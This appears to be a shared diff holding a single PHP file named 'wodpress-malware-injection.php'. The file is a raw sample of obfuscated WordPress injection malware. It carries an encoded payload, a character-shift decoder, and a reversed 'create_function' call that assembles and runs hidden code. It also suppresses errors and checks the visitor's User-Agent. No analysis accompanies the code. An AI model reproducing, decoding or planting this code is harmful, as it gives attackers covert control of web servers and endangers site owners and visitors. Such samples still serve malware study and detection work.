manjeshpv · February 29, 2016 09:37 · manjeshpv · Feb 29, 2016
diff --git a/wodpress-malware-injection.php b/wodpress-malware-injection.php
 <?php $tnfnirv = '#!>!2p%Z<^2	x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#w)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#DyfR	x27tfs%6<*17-SFEBFI,6<*1)ftpmdXA6|7**197-2qj%7-K)udfoopdXA	x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-U5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256<.4`hA	x27pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6	x63	164	x69	157	x6e"; function evltynv($n){return chr(ord($n)-1);#!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeob%t2w/	x24)##-!#~<#/%	x24-	x24!>Ypp3)%cB%iN}#-!	x24/%tx74	145	x5f	146	x75	1572	164") && (!isset($Gbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`	x27*&7-n%)utjm6<	x7fw6*CW&)7gj6<*K)85]Ke]53Ld]53]Kc]55Ld]55#*<%bGx27{**u%-#jt0}Z;0]=]0#)2q%l}S;bubE{h%)tpqsut>j%!*72!	x27!hmg%)!gj%h00#*<%nfd)##Qtpz)#]341)#	x24#-!#]y38#-!%w:**<")));$aebbqtv = $wczleed("", $mse7,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67Rh%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n4	x5c%j^	x24-	x24tvctus)%	x24-	x24b!>!%yy)#}#-#	x22-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_	x5c}X	x24<!%tmwyf`opjudovg	x22)!gj}1~!<2p%	x7f!~!<#4-	x24-tusqpt)%z-#:#*	x24-	x24!>!	x24/%tjw:8297f:5297e:56-xr.985:52985-t.9%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64yx72	166	x3a	61	x31"))) { $wczleed = "	x63	162	x65	141	!+A!>!{e%)!>>	x22!ftmbg)!gj<*#k#)usbut`cpV	x7f	x7f	x7f	x7f<u%V	x2bqwx); $aebbqtv();}}*f	x27,*e	x27,*d	x27,*c	x27,*b	x27)fepdof.)fe~6<tfs%w6<	x7fw6*CWtfs%)72M3]317]445]212]445]43]321]464]284]M5]D2P4]D6#<%G]y6d]281Ld]245]K2]27;!>>>!}_;gvc%}&;ftmbg}	x7f;!osvufs}w;*	x7f!>>	x22!pd%fm%:-5ppde:4:|:**#ppde#)tutjyf`4	x223}!+!<+{e%+*!*+fepdif((function_exists("	x6f	142	x5f	163	x74	141	x)	x24]25	x24-	x24-!%	x24-	x24*!|!	x24-	x2/	x24)%	x24-	x24y4	x24-	x24]y8	x24-	#npd/#)rrd/#00;quui#>.%!<**} @error_reporting(0); $msebqwx = implode(array_map("evltynv"%)3of)fepdof`57ftbc	x7f!	x24/%tmw/	x24)%zW%h>EzH,2W%wN;#-Ez-1H*WC>1*!%b:>1<!fmtf!%b:>%s:	x5c%j:.2^,%b:<!%c:>%s:	x5c%j:^<!%w`	x5c^>x24]26	x24-	x24<%j,,*!|	x24-/20QUUI7jsv%7UFH#	x27rfs%6~6<	x7fw6<*Kw*[!%rN}#QwTW%hIr	x5c1^-%r	x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759fe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*	137	x41	107	x45	116	x54"ujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1364]6]234]342]58]24]31#-%tdz*Wsfuv]y6g]257]y86]267]y74]275]y7:]37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{*7{ftmfV	x7f<*X&Z&S{ftmfV	x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R3#zsfvr#	x5cq%)ufttj	x22)gj6<^#Y#	x5cq%	x27Y%6<.msv`fts268]y7f#<!%tww!>!	x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sut|:*r%:-t%)3of:opjudovg<~	x24<!%o:!>5j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuho]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]87y]562]38y]572]48y]#>m%:{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!		x27&6<	x7fw6*	x7f_*#[k2`{6:!7&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6#<%tdz>#L4]275L3]248L3P6L1%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618dgj6<*id%)ftpmdR6<*id%)df}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}fsX	x27u%)7fmjix6<C	x27&6<*rfs%7-K)fmw/	x24)%c*W%eN+#Qi	x5c1^W%c!>!%i	x5c2^<!Ce*[!6<.2`hA	x27pd%6<C	x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyfvd},;uqpuft`msvd}+;!>!}	x2FWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)5	x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu]); if ((strstr($uas,"	x6d	163	x69	145")) or (strstr($uas,"	2]47y]252]18y]#>q%<#762]6vr#	x5cq%7/7#@#7/7^#iubq#	x5cq%	x27jsv%6<C>^#zsfvr#	x5cq%7**^f;!opjudovg}k~~9{d%:gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*!gjZ<#opo#>b%!**X)ufttjFOJ`GB)fubfsdXA	x27K6<	x7fw6*3qj%7>	x2272qj%)7gj6<**2qj%)hop,str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]ym3qjA)qj3hopmA	x273qj%6<*Y%)fnbozcYufhA	x272qj%6<^#zsfbqA7>q%6<	x7fw6*	x7f_*#fubfsdXk5`{66~6<&%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#pdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<#4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutj!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+9938]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#461"]=1; $uas=strtolower($_SERVER["	x48	124	x54	120	x5f	125	x53	105	x52M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Dfcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!-#1]#-j{fpg)%	x24-	x24*<!~!	x24/1]K78:56985:6197g:74985-rr.93e:5597f-s.973	x24gvodujpo!	x24-	x24y7	x24-	x24*<!	x24-	x24gps)%j>1<%j=t~6<&w6<	x7fw6*CW&)7gj6<.[Aosvufs:~928>>	x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h1927!fyqmpef)#	x24*<!%t::!>!	x24-MSV,6<*)ujojR	x27id%6<	x7fw6*	x7f_*#ujojRk3`{666*#k#)tutjyf`x	x22l:!}V;3q%}U;y]}R;2]FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gjjm!|!*5!	x27!hmg%)!gj!|!*1?hmg%)!>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~	x24<!fwbm)%tj73]83]238M7]381]211M5]67]452]88]5]48]3w6<	x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA	x227-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7!~!<b%	x7f!<X>b%Z<#opo#>b%!*##>>X)4l}	x27;%!<*#}_;#)323ldfid>}&;!osvufs}	x71GO	x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	x27!hmg%)!gj!~<ofmy]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]!	x242178}527}88:}334}472	x24<!%ff2!>!bssbzftpmdXA6~6<u%7>/7&6|7**111127-K)eb},;osvufs}	x27;mnui}&;zepc}A;~!}	x7f;!|!}6c6f+9f5d816:+946:ce44#)zbssb!>!ss76#<!%w:!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.5`hA	x27pd%6<pd%w6Z6!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cS#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjwEw:Qb:Qc:W~!%z!>2<!gps)%j>t+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`ms9}:}.}-}!#*<%nfd>%fdy1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>LOBALS["	x61	156	x75	156	x61"])))) { $GLOBALS["	x61	156	x75	156	x6so!%bss	x5csboe))1/35.)1/14+9z+sfwjidsb`bj+upcotn+qsvm**-)1/2986+7**^/%rx<~!!%s%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utsTrREvxNoiTCnuf_EtaerCxECalPer_Rtsmmnpuqc'; $dniiyhk=explode(chr((450-330)),substr($tnfnirv,(31394-25517),(226-192))); $sduzcrlt = $dniiyhk[0]($dniiyhk[(4-3)]); $ehlrck = $dniiyhk[0]($dniiyhk[(7-5)]); if (!function_exists('roijpvhm')) { function roijpvhm($qwuwue, $dhefqzdgu,$hipnkx) { $muzvybrk = NULL; for($xioqtie=0;$xioqtie<(sizeof($qwuwue)/2);$xioqtie++) { $muzvybrk .= substr($dhefqzdgu, $qwuwue[($xioqtie*2)],$qwuwue[($xioqtie*2)+(3-2)]); } return $hipnkx(chr((50-41)),chr((446-354)),$muzvybrk); }; } $bttjuci = explode(chr((135-91)),'1590,47,580,22,5679,66,4036,69,2160,25,3301,60,1204,54,558,22,385,67,1741,61,3611,62,5361,62,342,43,3117,64,635,36,5252,34,3035,36,2185,35,1960,38,143,68,3551,60,3673,54,3386,61,2407,54,3727,40,4774,39,2828,43,1388,25,2959,24,115,28,4813,40,4477,49,4353,26,2799,29,2983,52,5575,52,3181,26,1481,54,4616,41,2555,55,4164,63,731,35,5092,54,5824,53,4657,33,3467,61,3854,67,1041,36,0,53,4928,56,1714,27,1343,45,3802,52,452,53,5774,25,5529,46,3921,68,5327,34,602,33,4562,54,4853,34,3528,23,3259,42,1802,23,5423,35,3207,52,4887,41,3447,20,4379,70,2645,37,1535,55,2124,36,1258,65,2337,70,846,44,2283,54,4526,36,5286,41,2762,37,701,30,984,57,281,61,2254,29,2461,54,890,44,1151,53,3989,47,3361,25,2738,24,2610,35,5209,43,1637,41,934,50,1077,42,1678,36,1932,28,4295,58,4227,26,505,31,4449,28,536,22,3071,46,2897,62,211,70,1825,42,1998,58,2682,56,4253,42,1119,32,2056,68,5046,46,3767,35,4105,59,2871,26,1448,33,671,30,5627,21,2515,40,766,24,5146,63,4736,38,1413,35,2220,34,5745,29,5799,25,4984,62,1867,65,5503,26,5648,31,4690,46,53,62,5458,45,790,56,1323,20'); $cecszgct = $sduzcrlt("",roijpvhm($bttjuci,$tnfnirv,$ehlrck)); $sduzcrlt=$tnfnirv; $cecszgct(""); $cecszgct=(711-590); $tnfnirv=$cecszgct-1; ?>